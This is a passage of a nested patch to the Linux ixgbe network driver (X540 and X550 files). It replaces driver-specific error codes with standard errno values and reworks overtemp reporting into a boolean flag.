+ 	if (status) {
+ 		hw_dbg(hw, "semaphore failed with %d", status);
+-		return IXGBE_ERR_SWFW_SYNC;
++		return -EBUSY;
+ 	}
+ 
+ 	ctrl = IXGBE_CTRL_RST;
+@@ -103,7 +103,7 @@ mac_reset_top:
+ 	}
+ 
+ 	if (ctrl & IXGBE_CTRL_RST_MASK) {
+-		status = IXGBE_ERR_RESET_FAILED;
++		status = -EIO;
+ 		hw_dbg(hw, "Reset polling failed to complete.\n");
+ 	}
+ 	msleep(100);
+@@ -220,7 +220,7 @@ static s32 ixgbe_read_eerd_X540(struct ixgbe_hw *hw, u16 offset, u16 *data)
+ 	s32 status;
+ 
+ 	if (hw->mac.ops.acquire_swfw_sync(hw, IXGBE_GSSR_EEP_SM))
+-		return IXGBE_ERR_SWFW_SYNC;
++		return -EBUSY;
+ 
+ 	status = ixgbe_read_eerd_generic(hw, offset, data);
+ 
+@@ -243,7 +243,7 @@ static s32 ixgbe_read_eerd_buffer_X540(struct ixgbe_hw *hw,
+ 	s32 status;
+ 
+ 	if (hw->mac.ops.acquire_swfw_sync(hw, IXGBE_GSSR_EEP_SM))
+-		return IXGBE_ERR_SWFW_SYNC;
++		return -EBUSY;
+ 
+ 	status = ixgbe_read_eerd_buffer_generic(hw, offset, words, data);
+ 
+@@ -264,7 +264,7 @@ static s32 ixgbe_write_eewr_X540(struct ixgbe_hw *hw, u16 offset, u16 data)
+ 	s32 status;
+ 
+ 	if (hw->mac.ops.acquire_swfw_sync(hw, IXGBE_GSSR_EEP_SM))
+-		return IXGBE_ERR_SWFW_SYNC;
++		return -EBUSY;
+ 
+ 	status = ixgbe_write_eewr_generic(hw, offset, data);
+ 
+@@ -287,7 +287,7 @@ static s32 ixgbe_write_eewr_buffer_X540(struct ixgbe_hw *hw,
+ 	s32 status;
+ 
+ 	if (hw->mac.ops.acquire_swfw_sync(hw, IXGBE_GSSR_EEP_SM))
+-		return IXGBE_ERR_SWFW_SYNC;
++		return -EBUSY;
+ 
+ 	status = ixgbe_write_eewr_buffer_generic(hw, offset, words, data);
+ 
+@@ -324,7 +324,7 @@ static s32 ixgbe_calc_eeprom_checksum_X540(struct ixgbe_hw *hw)
+ 	for (i = 0; i < checksum_last_word; i++) {
+ 		if (ixgbe_read_eerd_generic(hw, i, &word)) {
+ 			hw_dbg(hw, "EEPROM read failed\n");
+-			return IXGBE_ERR_EEPROM;
++			return -EIO;
+ 		}
+ 		checksum += word;
+ 	}
+@@ -349,7 +349,7 @@ static s32 ixgbe_calc_eeprom_checksum_X540(struct ixgbe_hw *hw)
+ 
+ 		if (ixgbe_read_eerd_generic(hw, pointer, &length)) {
+ 			hw_dbg(hw, "EEPROM read failed\n");
+-			return IXGBE_ERR_EEPROM;
++			return -EIO;
+ 		}
+ 
+ 		/* Skip pointer section if length is invalid. */
+@@ -360,7 +360,7 @@ static s32 ixgbe_calc_eeprom_checksum_X540(struct ixgbe_hw *hw)
+ 		for (j = pointer + 1; j <= pointer + length; j++) {
+ 			if (ixgbe_read_eerd_generic(hw, j, &word)) {
+ 				hw_dbg(hw, "EEPROM read failed\n");
+-				return IXGBE_ERR_EEPROM;
++				return -EIO;
+ 			}
+ 			checksum += word;
+ 		}
+@@ -397,7 +397,7 @@ static s32 ixgbe_validate_eeprom_checksum_X540(struct ixgbe_hw *hw,
+ 	}
+ 
+ 	if (hw->mac.ops.acquire_swfw_sync(hw, IXGBE_GSSR_EEP_SM))
+-		return IXGBE_ERR_SWFW_SYNC;
++		return -EBUSY;
+ 
+ 	status = hw->eeprom.ops.calc_checksum(hw);
+ 	if (status < 0)
+@@ -418,7 +418,7 @@ static s32 ixgbe_validate_eeprom_checksum_X540(struct ixgbe_hw *hw,
+ 	 */
+ 	if (read_checksum != checksum) {
+ 		hw_dbg(hw, "Invalid EEPROM checksum");
+-		status = IXGBE_ERR_EEPROM_CHECKSUM;
++		status = -EIO;
+ 	}
+ 
+ 	/* If the user cares, return the calculated checksum */
+@@ -455,7 +455,7 @@ static s32 ixgbe_update_eeprom_checksum_X540(struct ixgbe_hw *hw)
+ 	}
+ 
+ 	if (hw->mac.ops.acquire_swfw_sync(hw, IXGBE_GSSR_EEP_SM))
+-		return  IXGBE_ERR_SWFW_SYNC;
++		return  -EBUSY;
+ 
+ 	status = hw->eeprom.ops.calc_checksum(hw);
+ 	if (status < 0)
+@@ -490,7 +490,7 @@ static s32 ixgbe_update_flash_X540(struct ixgbe_hw *hw)
+ 	s32 status;
+ 
+ 	status = ixgbe_poll_flash_update_done_X540(hw);
+-	if (status == IXGBE_ERR_EEPROM) {
++	if (status == -EIO) {
+ 		hw_dbg(hw, "Flash update time out\n");
+ 		return status;
+ 	}
+@@ -540,7 +540,7 @@ static s32 ixgbe_poll_flash_update_done_X540(struct ixgbe_hw *hw)
+ 			return 0;
+ 		udelay(5);
+ 	}
+-	return IXGBE_ERR_EEPROM;
++	return -EIO;
+ }
+ 
+ /**
+@@ -575,7 +575,7 @@ s32 ixgbe_acquire_swfw_sync_X540(struct ixgbe_hw *hw, u32 mask)
+ 		 * SW_FW_SYNC bits (not just NVM)
+ 		 */
+ 		if (ixgbe_get_swfw_sync_semaphore(hw))
+-			return IXGBE_ERR_SWFW_SYNC;
++			return -EBUSY;
+ 
+ 		swfw_sync = IXGBE_READ_REG(hw, IXGBE_SWFW_SYNC(hw));
+ 		if (!(swfw_sync & (fwmask | swmask | hwmask))) {
+@@ -599,7 +599,7 @@ s32 ixgbe_acquire_swfw_sync_X540(struct ixgbe_hw *hw, u32 mask)
+ 	 * bits in the SW_FW_SYNC register.
+ 	 */
+ 	if (ixgbe_get_swfw_sync_semaphore(hw))
+-		return IXGBE_ERR_SWFW_SYNC;
++		return -EBUSY;
+ 	swfw_sync = IXGBE_READ_REG(hw, IXGBE_SWFW_SYNC(hw));
+ 	if (swfw_sync & (fwmask | hwmask)) {
+ 		swfw_sync |= swmask;
+@@ -622,11 +622,11 @@ s32 ixgbe_acquire_swfw_sync_X540(struct ixgbe_hw *hw, u32 mask)
+ 			rmask |= IXGBE_GSSR_I2C_MASK;
+ 		ixgbe_release_swfw_sync_X540(hw, rmask);
+ 		ixgbe_release_swfw_sync_semaphore(hw);
+-		return IXGBE_ERR_SWFW_SYNC;
++		return -EBUSY;
+ 	}
+ 	ixgbe_release_swfw_sync_semaphore(hw);
+ 
+-	return IXGBE_ERR_SWFW_SYNC;
++	return -EBUSY;
+ }
+ 
+ /**
+@@ -680,7 +680,7 @@ static s32 ixgbe_get_swfw_sync_semaphore(struct ixgbe_hw *hw)
+ 	if (i == timeout) {
+ 		hw_dbg(hw,
+ 		       "Software semaphore SMBI between device drivers not granted.\n");
+-		return IXGBE_ERR_EEPROM;
++		return -EIO;
+ 	}
+ 
+ 	/* Now get the semaphore between SW/FW through the REGSMP bit */
+@@ -697,7 +697,7 @@ static s32 ixgbe_get_swfw_sync_semaphore(struct ixgbe_hw *hw)
+ 	 */
+ 	hw_dbg(hw, "REGSMP Software NVM semaphore not granted\n");
+ 	ixgbe_release_swfw_sync_semaphore(hw);
+-	return IXGBE_ERR_EEPROM;
++	return -EIO;
+ }
+ 
+ /**
+@@ -768,7 +768,7 @@ s32 ixgbe_blink_led_start_X540(struct ixgbe_hw *hw, u32 index)
+ 	bool link_up;
+ 
+ 	if (index > 3)
+-		return IXGBE_ERR_PARAM;
++		return -EINVAL;
+ 
+ 	/* Link should be up in order for the blink bit in the LED control
+ 	 * register to work. Force link and speed in the MAC if link is down.
+@@ -804,7 +804,7 @@ s32 ixgbe_blink_led_stop_X540(struct ixgbe_hw *hw, u32 index)
+ 	u32 ledctl_reg;
+ 
+ 	if (index > 3)
+-		return IXGBE_ERR_PARAM;
++		return -EINVAL;
+ 
+ 	/* Restore the LED to its default value. */
+ 	ledctl_reg = IXGBE_READ_REG(hw, IXGBE_LEDCTL);
+diff --git a/drivers/net/ethernet/intel/ixgbe/ixgbe_x550.c b/drivers/net/ethernet/intel/ixgbe/ixgbe_x550.c
+index aa4bf6c9a2f7c..cdc912bba8089 100644
+--- a/drivers/net/ethernet/intel/ixgbe/ixgbe_x550.c
++++ b/drivers/net/ethernet/intel/ixgbe/ixgbe_x550.c
+@@ -206,13 +206,13 @@ static s32 ixgbe_reset_cs4227(struct ixgbe_hw *hw)
+ 	}
+ 	if (retry == IXGBE_CS4227_RETRIES) {
+ 		hw_err(hw, "CS4227 reset did not complete\n");
+-		return IXGBE_ERR_PHY;
++		return -EIO;
+ 	}
+ 
+ 	status = ixgbe_read_cs4227(hw, IXGBE_CS4227_EEPROM_STATUS, &value);
+ 	if (status || !(value & IXGBE_CS4227_EEPROM_LOAD_OK)) {
+ 		hw_err(hw, "CS4227 EEPROM did not load successfully\n");
+-		return IXGBE_ERR_PHY;
++		return -EIO;
+ 	}
+ 
+ 	return 0;
+@@ -350,13 +350,13 @@ static s32 ixgbe_identify_phy_x550em(struct ixgbe_hw *hw)
+ static s32 ixgbe_read_phy_reg_x550em(struct ixgbe_hw *hw, u32 reg_addr,
+ 				     u32 device_type, u16 *phy_data)
+ {
+-	return IXGBE_NOT_IMPLEMENTED;
++	return -EOPNOTSUPP;
+ }
+ 
+ static s32 ixgbe_write_phy_reg_x550em(struct ixgbe_hw *hw, u32 reg_addr,
+ 				      u32 device_type, u16 phy_data)
+ {
+-	return IXGBE_NOT_IMPLEMENTED;
++	return -EOPNOTSUPP;
+ }
+ 
+ /**
+@@ -463,7 +463,7 @@ s32 ixgbe_fw_phy_activity(struct ixgbe_hw *hw, u16 activity,
+ 		--retries;
+ 	} while (retries > 0);
+ 
+-	return IXGBE_ERR_HOST_INTERFACE_COMMAND;
++	return -EIO;
+ }
+ 
+ static const struct {
+@@ -511,7 +511,7 @@ static s32 ixgbe_get_phy_id_fw(struct ixgbe_hw *hw)
+ 	hw->phy.id |= phy_id_lo & IXGBE_PHY_REVISION_MASK;
+ 	hw->phy.revision = phy_id_lo & ~IXGBE_PHY_REVISION_MASK;
+ 	if (!hw->phy.id || hw->phy.id == IXGBE_PHY_REVISION_MASK)
+-		return IXGBE_ERR_PHY_ADDR_INVALID;
++		return -EFAULT;
+ 
+ 	hw->phy.autoneg_advertised = hw->phy.speeds_supported;
+ 	hw->phy.eee_speeds_supported = IXGBE_LINK_SPEED_100_FULL |
+@@ -568,7 +568,7 @@ static s32 ixgbe_setup_fw_link(struct ixgbe_hw *hw)
+ 
+ 	if (hw->fc.strict_ieee && hw->fc.requested_mode == ixgbe_fc_rx_pause) {
+ 		hw_err(hw, "rx_pause not valid in strict IEEE mode\n");
+-		return IXGBE_ERR_INVALID_LINK_SETTINGS;
++		return -EINVAL;
+ 	}
+ 
+ 	switch (hw->fc.requested_mode) {
+@@ -600,8 +600,10 @@ static s32 ixgbe_setup_fw_link(struct ixgbe_hw *hw)
+ 	rc = ixgbe_fw_phy_activity(hw, FW_PHY_ACT_SETUP_LINK, &setup);
+ 	if (rc)
+ 		return rc;
++
+ 	if (setup[0] == FW_PHY_ACT_SETUP_LINK_RSP_DOWN)
+-		return IXGBE_ERR_OVERTEMP;
++		return -EIO;
++
+ 	return 0;
+ }
+ 
+@@ -675,7 +677,7 @@ static s32 ixgbe_iosf_wait(struct ixgbe_hw *hw, u32 *ctrl)
+ 		*ctrl = command;
+ 	if (i == IXGBE_MDIO_COMMAND_TIMEOUT) {
+ 		hw_dbg(hw, "IOSF wait timed out\n");
+-		return IXGBE_ERR_PHY;
++		return -EIO;
+ 	}
+ 
+ 	return 0;
+@@ -715,7 +717,8 @@ static s32 ixgbe_read_iosf_sb_reg_x550(struct ixgbe_hw *hw, u32 reg_addr,
+ 		error = (command & IXGBE_SB_IOSF_CTRL_CMPL_ERR_MASK) >>
+ 			 IXGBE_SB_IOSF_CTRL_CMPL_ERR_SHIFT;
+ 		hw_dbg(hw, "Failed to read, error %x\n", error);
+-		return IXGBE_ERR_PHY;
++		ret = -EIO;
++		goto out;
+ 	}
+ 
+ 	if (!ret)
+@@ -750,9 +753,9 @@ static s32 ixgbe_get_phy_token(struct ixgbe_hw *hw)
+ 	if (token_cmd.hdr.cmd_or_resp.ret_status == FW_PHY_TOKEN_OK)
+ 		return 0;
+ 	if (token_cmd.hdr.cmd_or_resp.ret_status != FW_PHY_TOKEN_RETRY)
+-		return IXGBE_ERR_FW_RESP_INVALID;
++		return -EIO;
+ 
+-	return IXGBE_ERR_TOKEN_RETRY;
++	return -EAGAIN;
+ }
+ 
+ /**
+@@ -778,7 +781,7 @@ static s32 ixgbe_put_phy_token(struct ixgbe_hw *hw)
+ 		return status;
+ 	if (token_cmd.hdr.cmd_or_resp.ret_status == FW_PHY_TOKEN_OK)
+ 		return 0;
+-	return IXGBE_ERR_FW_RESP_INVALID;
++	return -EIO;
+ }
+ 
+ /**
+@@ -942,7 +945,7 @@ static s32 ixgbe_checksum_ptr_x550(struct ixgbe_hw *hw, u16 ptr,
+ 		local_buffer = buf;
+ 	} else {
+ 		if (buffer_size < ptr)
+-			return  IXGBE_ERR_PARAM;
++			return  -EINVAL;
+ 		local_buffer = &buffer[ptr];
+ 	}
+ 
+@@ -960,7 +963,7 @@ static s32 ixgbe_checksum_ptr_x550(struct ixgbe_hw *hw, u16 ptr,
+ 	}
+ 
+ 	if (buffer && ((u32)start + (u32)length > buffer_size))
+-		return IXGBE_ERR_PARAM;
++		return -EINVAL;
+ 
+ 	for (i = start; length; i++, length--) {
+ 		if (i == bufsz && !buffer) {
+@@ -1012,7 +1015,7 @@ static s32 ixgbe_calc_checksum_X550(struct ixgbe_hw *hw, u16 *buffer,
+ 		local_buffer = eeprom_ptrs;
+ 	} else {
+ 		if (buffer_size < IXGBE_EEPROM_LAST_WORD)
+-			return IXGBE_ERR_PARAM;
++			return -EINVAL;
+ 		local_buffer = buffer;
+ 	}
+ 
+@@ -1148,7 +1151,7 @@ static s32 ixgbe_validate_eeprom_checksum_X550(struct ixgbe_hw *hw,
+ 	 * calculated checksum
+ 	 */
+ 	if (read_checksum != checksum) {
+-		status = IXGBE_ERR_EEPROM_CHECKSUM;
++		status = -EIO;
+ 		hw_dbg(hw, "Invalid EEPROM checksum");
+ 	}
+ 
+@@ -1203,7 +1206,7 @@ static s32 ixgbe_write_ee_hostif_X550(struct ixgbe_hw *hw, u16 offset, u16 data)
+ 		hw->mac.ops.release_swfw_sync(hw, IXGBE_GSSR_EEP_SM);
+ 	} else {
+ 		hw_dbg(hw, "write ee hostif failed to get semaphore");
+-		status = IXGBE_ERR_SWFW_SYNC;
++		status = -EBUSY;
+ 	}
+ 
+ 	return status;
+@@ -1415,7 +1418,7 @@ static s32 ixgbe_write_iosf_sb_reg_x550(struct ixgbe_hw *hw, u32 reg_addr,
+ 		error = (command & IXGBE_SB_IOSF_CTRL_CMPL_ERR_MASK) >>
+ 			 IXGBE_SB_IOSF_CTRL_CMPL_ERR_SHIFT;
+ 		hw_dbg(hw, "Failed to write, error %x\n", error);
+-		return IXGBE_ERR_PHY;
++		return -EIO;
+ 	}
+ 
+ out:
+@@ -1558,7 +1561,7 @@ static s32 ixgbe_setup_ixfi_x550em(struct ixgbe_hw *hw, ixgbe_link_speed *speed)
+ 
+ 	/* iXFI is only supported with X552 */
+ 	if (mac->type != ixgbe_mac_X550EM_x)
+-		return IXGBE_ERR_LINK_SETUP;
++		return -EIO;
+ 
+ 	/* Disable AN and force speed to 10G Serial. */
+ 	status = ixgbe_read_iosf_sb_reg_x550(hw,
+@@ -1580,7 +1583,7 @@ static s32 ixgbe_setup_ixfi_x550em(struct ixgbe_hw *hw, ixgbe_link_speed *speed)
+ 		break;
+ 	default:
+ 		/* Other link speeds are not supported by internal KR PHY. */
+-		return IXGBE_ERR_LINK_SETUP;
++		return -EINVAL;
+ 	}
+ 
+ 	status = ixgbe_write_iosf_sb_reg_x550(hw,
+@@ -1611,7 +1614,7 @@ static s32 ixgbe_supported_sfp_modules_X550em(struct ixgbe_hw *hw, bool *linear)
+ {
+ 	switch (hw->phy.sfp_type) {
+ 	case ixgbe_sfp_type_not_present:
+-		return IXGBE_ERR_SFP_NOT_PRESENT;
++		return -ENOENT;
+ 	case ixgbe_sfp_type_da_cu_core0:
+ 	case ixgbe_sfp_type_da_cu_core1:
+ 		*linear = true;
+@@ -1630,7 +1633,7 @@ static s32 ixgbe_supported_sfp_modules_X550em(struct ixgbe_hw *hw, bool *linear)
+ 	case ixgbe_sfp_type_1g_cu_core0:
+ 	case ixgbe_sfp_type_1g_cu_core1:
+ 	default:
+-		return IXGBE_ERR_SFP_NOT_SUPPORTED;
++		return -EOPNOTSUPP;
+ 	}
+ 
+ 	return 0;
+@@ -1660,7 +1663,7 @@ ixgbe_setup_mac_link_sfp_x550em(struct ixgbe_hw *hw,
+ 	 * there is no reason to configure CS4227 and SFP not present error is
+ 	 * not accepted in the setup MAC link flow.
+ 	 */
+-	if (status == IXGBE_ERR_SFP_NOT_PRESENT)
++	if (status == -ENOENT)
+ 		return 0;
+ 
+ 	if (status)
+@@ -1718,7 +1721,7 @@ static s32 ixgbe_setup_sfi_x550a(struct ixgbe_hw *hw, ixgbe_link_speed *speed)
+ 		break;
+ 	default:
+ 		/* Other link speeds are not supported by internal PHY. */
+-		return IXGBE_ERR_LINK_SETUP;
++		return -EINVAL;
+ 	}
+ 
+ 	(void)mac->ops.write_iosf_sb_reg(hw,
+@@ -1803,7 +1806,7 @@ ixgbe_setup_mac_link_sfp_n(struct ixgbe_hw *hw, ixgbe_link_speed speed,
+ 	/* If no SFP module present, then return success. Return success since
+ 	 * SFP not present error is not excepted in the setup MAC link flow.
+ 	 */
+-	if (ret_val == IXGBE_ERR_SFP_NOT_PRESENT)
++	if (ret_val == -ENOENT)
+ 		return 0;
+ 
+ 	if (ret_val)
+@@ -1853,7 +1856,7 @@ ixgbe_setup_mac_link_sfp_x550a(struct ixgbe_hw *hw, ixgbe_link_speed speed,
+ 	/* If no SFP module present, then return success. Return success since
+ 	 * SFP not present error is not excepted in the setup MAC link flow.
+ 	 */
+-	if (ret_val == IXGBE_ERR_SFP_NOT_PRESENT)
++	if (ret_val == -ENOENT)
+ 		return 0;
+ 
+ 	if (ret_val)
+@@ -1863,7 +1866,7 @@ ixgbe_setup_mac_link_sfp_x550a(struct ixgbe_hw *hw, ixgbe_link_speed speed,
+ 	ixgbe_setup_kr_speed_x550em(hw, speed);
+ 
+ 	if (hw->phy.mdio.prtad == MDIO_PRTAD_NONE)
+-		return IXGBE_ERR_PHY_ADDR_INVALID;
++		return -EFAULT;
+ 
+ 	/* Get external PHY SKU id */
+ 	ret_val = hw->phy.ops.read_reg(hw, IXGBE_CS4227_EFUSE_PDF_SKU,
+@@ -1962,7 +1965,7 @@ static s32 ixgbe_check_link_t_X550em(struct ixgbe_hw *hw,
+ 	u16 i, autoneg_status;
+ 
+ 	if (hw->mac.ops.get_media_type(hw) != ixgbe_media_type_copper)
+-		return IXGBE_ERR_CONFIG;
++		return -EIO;
+ 
+ 	status = ixgbe_check_mac_link_generic(hw, speed, link_up,
+ 					      link_up_wait_to_complete);
+@@ -2145,9 +2148,9 @@ static s32 ixgbe_setup_sgmii_fw(struct ixgbe_hw *hw, ixgbe_link_speed speed,
+  */
+ static void ixgbe_fc_autoneg_sgmii_x550em_a(struct ixgbe_hw *hw)
+ {
+-	s32 status = IXGBE_ERR_FC_NOT_NEGOTIATED;
+ 	u32 info[FW_PHY_ACT_DATA_COUNT] = { 0 };
+ 	ixgbe_link_speed speed;
++	s32 status = -EIO;
+ 	bool link_up;
+ 
+ 	/* AN should have completed when the cable was plugged in.
+@@ -2165,7 +2168,7 @@ static void ixgbe_fc_autoneg_sgmii_x550em_a(struct ixgbe_hw *hw)
+ 	/* Check if auto-negotiation has completed */
+ 	status = ixgbe_fw_phy_activity(hw, FW_PHY_ACT_GET_LINK_INFO, &info);
+ 	if (status || !(info[0] & FW_PHY_ACT_GET_LINK_INFO_AN_COMPLETE)) {
+-		status = IXGBE_ERR_FC_NOT_NEGOTIATED;
++		status = -EIO;
+ 		goto out;
+ 	}
+ 
+@@ -2369,18 +2372,18 @@ static s32 ixgbe_get_link_capabilities_X550em(struct ixgbe_hw *hw,
+  * @hw: pointer to hardware structure
+  * @lsc: pointer to boolean flag which indicates whether external Base T
+  *	 PHY interrupt is lsc
++ * @is_overtemp: indicate whether an overtemp event encountered
+  *
+  * Determime if external Base T PHY interrupt cause is high temperature
+  * failure alarm or link status change.
+- *
+- * Return IXGBE_ERR_OVERTEMP if interrupt is high temperature
+- * failure alarm, else return PHY access status.
+  **/
+-static s32 ixgbe_get_lasi_ext_t_x550em(struct ixgbe_hw *hw, bool *lsc)
++static s32 ixgbe_get_lasi_ext_t_x550em(struct ixgbe_hw *hw, bool *lsc,
++				       bool *is_overtemp)
+ {
+ 	u32 status;
+ 	u16 reg;
+ 
++	*is_overtemp = false;
+ 	*lsc = false;
+ 
+ 	/* Vendor alarm triggered */
+@@ -2412,7 +2415,8 @@ static s32 ixgbe_get_lasi_ext_t_x550em(struct ixgbe_hw *hw, bool *lsc)
+ 	if (reg & IXGBE_MDIO_GLOBAL_ALM_1_HI_TMP_FAIL) {
+ 		/* power down the PHY in case the PHY FW didn't already */
+ 		ixgbe_set_copper_phy_power(hw, false);
+-		return IXGBE_ERR_OVERTEMP;
++		*is_overtemp = true;
++		return -EIO;
+ 	}
+ 	if (reg & IXGBE_MDIO_GLOBAL_ALM_1_DEV_FAULT) {
+ 		/*  device fault alarm triggered */
+@@ -2426,7 +2430,8 @@ static s32 ixgbe_get_lasi_ext_t_x550em(struct ixgbe_hw *hw, bool *lsc)
+ 		if (reg == IXGBE_MDIO_GLOBAL_FAULT_MSG_HI_TMP) {
+ 			/* power down the PHY in case the PHY FW didn't */
+ 			ixgbe_set_copper_phy_power(hw, false);
+-			return IXGBE_ERR_OVERTEMP;
++			*is_overtemp = true;
++			return -EIO;
+ 		}
+ 	}
+ 
+@@ -2462,12 +2467,12 @@ static s32 ixgbe_get_lasi_ext_t_x550em(struct ixgbe_hw *hw, bool *lsc)
+  **/
+ static s32 ixgbe_enable_lasi_ext_t_x550em(struct ixgbe_hw *hw)
+ {
++	bool lsc, overtemp;
+ 	u32 status;
+ 	u16 reg;
+-	bool lsc;
+ 
+ 	/* Clear interrupt flags */
+-	status = ixgbe_get_lasi_ext_t_x550em(hw, &lsc);
++	status = ixgbe_get_lasi_ext_t_x550em(hw, &lsc, &overtemp);
+ 
+ 	/* Enable link status change alarm */
+ 
+@@ -2546,21 +2551,20 @@ static s32 ixgbe_enable_lasi_ext_t_x550em(struct ixgbe_hw *hw)
+ /**
+  * ixgbe_handle_lasi_ext_t_x550em - Handle external Base T PHY interrupt
+  * @hw: pointer to hardware structure
++ * @is_overtemp: indicate whether an overtemp event encountered
+  *
+  * Handle external Base T PHY interrupt. If high temperature
+  * failure alarm then return error, else if link status change
+  * then setup internal/external PHY link
+- *
+- * Return IXGBE_ERR_OVERTEMP if interrupt is high temperature
+- * failure alarm, else return PHY access status.
+  **/
+-static s32 ixgbe_handle_lasi_ext_t_x550em(struct ixgbe_hw *hw)
++static s32 ixgbe_handle_lasi_ext_t_x550em(struct ixgbe_hw *hw,
++					  bool *is_overtemp)
+ {
+ 	struct ixgbe_phy_info *phy = &hw->phy;
+ 	bool lsc;
+ 	u32 status;
+ 
+-	status = ixgbe_get_lasi_ext_t_x550em(hw, &lsc);
++	status = ixgbe_get_lasi_ext_t_x550em(hw, &lsc, is_overtemp);
+ 	if (status)
+ 		return status;
+ 
+@@ -2692,7 +2696,7 @@ static s32 ixgbe_setup_internal_phy_t_x550em(struct ixgbe_hw *hw)
+ 	u16 speed;
+ 
+ 	if (hw->mac.ops.get_media_type(hw) != ixgbe_media_type_copper)
+-		return IXGBE_ERR_CONFIG;
++		return -EIO;
+ 
+ 	if (!(hw->mac.type == ixgbe_mac_X550EM_x &&
+ 	      !(hw->phy.nw_mng_if_sel & IXGBE_NW_MNG_IF_SEL_INT_PHY_MODE))) {
+@@ -2735,7 +2739,7 @@ static s32 ixgbe_setup_internal_phy_t_x550em(struct ixgbe_hw *hw)
+ 		break;
+ 	default:
+ 		/* Internal PHY does not support anything else */
+-		return IXGBE_ERR_INVALID_LINK_SETTINGS;
++		return -EINVAL;
+ 	}
+ 
+ 	return ixgbe_setup_ixfi_x550em(hw, &force_speed);
+@@ -2767,7 +2771,7 @@ static s32 ixgbe_led_on_t_x550em(struct ixgbe_hw *hw, u32 led_idx)
+ 	u16 phy_data;
+ 
+ 	if (led_idx >= IXGBE_X557_MAX_LED_INDEX)
+-		return IXGBE_ERR_PARAM;
++		return -EINVAL;
+ 
+ 	/* To turn on the LED, set mode to ON. */
+ 	hw->phy.ops.read_reg(hw, IXGBE_X557_LED_PROVISIONING + led_idx,
+@@ -2789,7 +2793,7 @@ static s32 ixgbe_led_off_t_x550em(struct ixgbe_hw *hw, u32 led_idx)
+ 	u16 phy_data;
+ 
+ 	if (led_idx >= IXGBE_X557_MAX_LED_INDEX)
+-		return IXGBE_ERR_PARAM;
++		return -EINVAL;
+ 
+ 	/* To turn on the LED, set mode to ON. */
+ 	hw->phy.ops.read_reg(hw, IXGBE_X557_LED_PROVISIONING + led_idx,
+@@ -2813,8 +2817,9 @@ static s32 ixgbe_led_off_t_x550em(struct ixgbe_hw *hw, u32 led_idx)
+  *
+  *  Sends driver version number to firmware through the manageability
+  *  block.  On success return 0
+- *  else returns IXGBE_ERR_SWFW_SYNC when encountering an error acquiring
+- *  semaphore or IXGBE_ERR_HOST_INTERFACE_COMMAND when command fails.
++ *  else returns -EBUSY when encountering an error acquiring
++ *  semaphore, -EIO when command fails or -ENIVAL when incorrect
++ *  params passed.
+  **/
+ static s32 ixgbe_set_fw_drv_ver_x550(struct ixgbe_hw *hw, u8 maj, u8 min,
+ 				     u8 build, u8 sub, u16 len,
+@@ -2825,7 +2830,7 @@ static s32 ixgbe_set_fw_drv_ver_x550(struct ixgbe_hw *hw, u8 maj, u8 min,
+ 	int i;
+ 
+ 	if (!len || !driver_ver || (len > sizeof(fw_cmd.driver_string)))
+-		return IXGBE_ERR_INVALID_ARGUMENT;
++		return -EINVAL;
+ 
+ 	fw_cmd.hdr.cmd = FW_CEM_CMD_DRIVER_INFO;
+ 	fw_cmd.hdr.buf_len = FW_CEM_CMD_DRIVER_INFO_LEN + len;
+@@ -2850,7 +2855,7 @@ static s32 ixgbe_set_fw_drv_ver_x550(struct ixgbe_hw *hw, u8 maj, u8 min,
+ 
+ 		if (fw_cmd.hdr.cmd_or_resp.ret_status !=
+ 		    FW_CEM_RESP_STATUS_SUCCESS)
+-			return IXGBE_ERR_HOST_INTERFACE_COMMAND;
++			return -EIO;
+ 		return 0;
+ 	}
+ 
+@@ -2907,7 +2912,7 @@ static s32 ixgbe_setup_fc_x550em(struct ixgbe_hw *hw)
+ 	/* Validate the requested mode */
+ 	if (hw->fc.strict_ieee && hw->fc.requested_mode == ixgbe_fc_rx_pause) {
+ 		hw_err(hw, "ixgbe_fc_rx_pause not valid in strict IEEE mode\n");
+-		return IXGBE_ERR_INVALID_LINK_SETTINGS;
++		return -EINVAL;
+ 	}
+ 
+ 	/* 10gig parts do not have a word in the EEPROM to determine the
+@@ -2942,7 +2947,7 @@ static s32 ixgbe_setup_fc_x550em(struct ixgbe_hw *hw)
+ 		break;
+ 	default:
+ 		hw_err(hw, "Flow control param set incorrectly\n");
+-		return IXGBE_ERR_CONFIG;
++		return -EIO;
+ 	}
+ 
+ 	switch (hw->device_id) {
+@@ -2986,8 +2991,8 @@ static s32 ixgbe_setup_fc_x550em(struct ixgbe_hw *hw)
+ static void ixgbe_fc_autoneg_backplane_x550em_a(struct ixgbe_hw *hw)
+ {
+ 	u32 link_s1, lp_an_page_low, an_cntl_1;
+-	s32 status = IXGBE_ERR_FC_NOT_NEGOTIATED;
+ 	ixgbe_link_speed speed;
++	s32 status = -EIO;
+ 	bool link_up;
+ 
+ 	/* AN should have completed when the cable was plugged in.
+@@ -3013,7 +3018,7 @@ static void ixgbe_fc_autoneg_backplane_x550em_a(struct ixgbe_hw *hw)
+ 
+ 	if (status || (link_s1 & IXGBE_KRM_LINK_S1_MAC_AN_COMPLETE) == 0) {
+ 		hw_dbg(hw, "Auto-Negotiation did not complete\n");
+-		status = IXGBE_ERR_FC_NOT_NEGOTIATED;
++		status = -EIO;
+ 		goto out;
+ 	}
+ 
+@@ -3187,21 +3192,23 @@ static s32 ixgbe_reset_phy_fw(struct ixgbe_hw *hw)
+ /**
+  * ixgbe_check_overtemp_fw - Check firmware-controlled PHYs for overtemp
+  * @hw: pointer to hardware structure
++ *
++ * Return true when an overtemp event detected, otherwise false.
+  */
+-static s32 ixgbe_check_overtemp_fw(struct ixgbe_hw *hw)
++static bool ixgbe_check_overtemp_fw(struct ixgbe_hw *hw)
+ {
+ 	u32 store[FW_PHY_ACT_DATA_COUNT] = { 0 };
+ 	s32 rc;
+ 
+ 	rc = ixgbe_fw_phy_activity(hw, FW_PHY_ACT_GET_LINK_INFO, &store);
+ 	if (rc)
+-		return rc;
++		return false;
+ 
+ 	if (store[0] & FW_PHY_ACT_GET_LINK_INFO_TEMP) {
+ 		ixgbe_shutdown_fw_phy(hw);
+-		return IXGBE_ERR_OVERTEMP;
++		return true;
+ 	}
+-	return 0;
++	return false;
+ }
+ 
+ /**
+@@ -3251,8 +3258,7 @@ static s32 ixgbe_init_phy_ops_X550em(struct ixgbe_hw *hw)
+ 
+ 	/* Identify the PHY or SFP module */
+ 	ret_val = phy->ops.identify(hw);
+-	if (ret_val == IXGBE_ERR_SFP_NOT_SUPPORTED ||
+-	    ret_val == IXGBE_ERR_PHY_ADDR_INVALID)
++	if (ret_val == -EOPNOTSUPP || ret_val == -EFAULT)
+ 		return ret_val;
+ 
